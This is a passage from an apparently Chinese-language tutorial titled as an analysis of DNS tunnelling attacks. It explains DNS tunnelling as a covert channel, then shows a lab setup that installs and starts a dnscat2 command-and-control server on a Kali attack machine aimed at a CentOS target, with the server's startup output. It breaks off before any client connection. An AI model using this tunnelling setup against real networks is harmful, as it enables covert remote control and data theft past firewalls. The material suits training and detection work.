dns隧道攻击分析

DNS隧道是隐蔽信道的一种，通过将其他协议封装在DNS协议中传输建立通信。因为在我们的网络世界中DNS是一个必不可少的服务，所以大部分防火墙和入侵检测设备很少会过滤DNS流量，这就给dns隧道攻击作为一种隐蔽信道提供了条件，从而可以利用它实现诸如远程控制，文件传输等操作，现在越来越多的研究证明dns隧道攻击也经常在僵尸网络和APT攻击中扮演着重要的角色。

一、dns隧道攻击演练:dnscat2

攻击机(kali)：192.168.137.134

靶机(centos)：192.168.137.130

1、攻击机下载安装dnscat2

$ sudo git clone https://github.com/iagox86/dnscat2.git
$ cd dnscat2/server/
$ sudo gem install bundler
$ bundle install
//dns隧道攻击分析

2、攻击机上运行命令：ruby ./dnscat2.rb --secret=123456
 

┌──(kali㉿kali)-[/home/dnscat2/server]
└─$ ruby ./dnscat2.rb --secret=123456
 
New window created: 0
New window created: crypto-debug
Welcome to dnscat2! Some documentation may be out of date.
 
auto_attach => f